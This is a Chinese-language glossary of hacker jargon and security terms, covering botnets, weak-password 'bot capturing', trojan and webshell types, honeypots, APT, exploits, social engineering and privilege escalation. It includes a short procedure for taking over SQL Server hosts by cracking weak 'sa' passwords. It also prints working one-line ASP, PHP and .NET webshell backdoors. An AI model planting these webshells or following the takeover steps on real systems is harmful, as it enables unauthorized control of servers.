肉鸡
已经被种马的机器,多用该机器的流量进行ddos攻击,或刷流量,广告之类,或那该机器ip作跳板做其他违法事情。
抓鸡
通过扫描弱口令,爆破,漏洞自动化种马达到控制机器。如:1433抓鸡,3389抓鸡,3306抓鸡,数字指端口号。
抓鸡流程
1)收集地区IP网段
2)扫描端口并开放端口
3)破解sa账户的弱密码获得系统权限
4)下载木马
木马分类
1)计算机木马
2)网页木马(webshell):
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
3)大马
4)小马:体积小,主要用与上传大文件(大马)和webshell。由于网站上有上传文件大小的限制。
5)一句话木马:小马的一种,用与执行网站命令等操作,可使用中国菜刀来控制一句话木马1
2
3ASP <%execute(request("MH"))%>
PHP <?php eval($_POST[a]); ?>
.NET <%@Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
蜜罐
蜜罐技术本质上是一种对攻击方进行欺骗的技术,通过布置一些作为诱饵的主机、网络服务或者信息,诱使攻击方对它们实施攻击,从而可以对攻击行为进行捕获和分析,了解攻击方所使用的工具与方法,推测攻击意图和动机,能够让防御方清晰地了解他们所面对的安全威胁,并通过技术和管理手段来增强实际系统的安全防护能力。
蜜罐好比是情报收集系统。蜜罐好像是故意让人攻击的目标,引诱黑客前来攻击。所以攻击者入侵后,你就可以知道他是如何得逞的,随时了解针对服务器发动的最新的攻击和漏洞。还可以通过窃听黑客之间的联系,收集黑客所用的种种工具,并且掌握他们的社交网络。
互联网由3层网络组成
表层网:可以通过浏览器访问的网站
深网:无法通过搜索引擎访问,只能通过特定软件访问的内容,如QQ,通信软件之类的
暗网:深网的子网(分支)也是只能通过特定浏览器访问 域名后缀名多是.onion
免杀
使软件避开杀毒软件的杀死
APT攻击
APT攻击是(
Advanced Persistent Threat)高级持续性威胁。
利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式。一般是国家或者集团支撑一伙人去做违法的事情。
Exploit
Exploit(EXP)是指漏洞利用,有漏洞不一定有Exploit,但有Exploit就肯定有漏洞。
概念验证
概念验证(POC)是指漏洞概念证明 证明该版本有漏洞,但还不能利用。http://www.exploit-db.com/
内网渗透
通过手段来获得公司内部网络的信息资料。
社会工程学
心里学中的分支,在计算机科学中,社
会工程学是通过和他人的合法交流,使其心里受到影响,做出某些动作或者透露一些机密信息的方式。通常被认为是一种欺诈他人以收集信息,行骗和入侵计算机系统的行为。简单的说通过对话来引导别人做自己想做的事情。
社工库
通过社会工程系方式收集到的信息搭建成的数据库
脱裤
脱库。通过非法手段获取网站的数据库信息。简单到说就是把数据库下载下来。
提权
把普通用户提升为管理员权限。
谷歌黑客
谷歌黑客(Google Hacking)指利用Google搜索引擎搜索信息来进行入侵的技术和行为。
0day
一种计算机软件的攻击方式。通常是指还没有补丁的漏洞。通常掌握该技术的人都是该技术的发现者。
旁站
目标站点所在服务器上的其他网站,然后再想办法跨到真正目标站点的目录中。
C段
网段中的任意一台机器,只要子网相同就可以嗅探到账号密码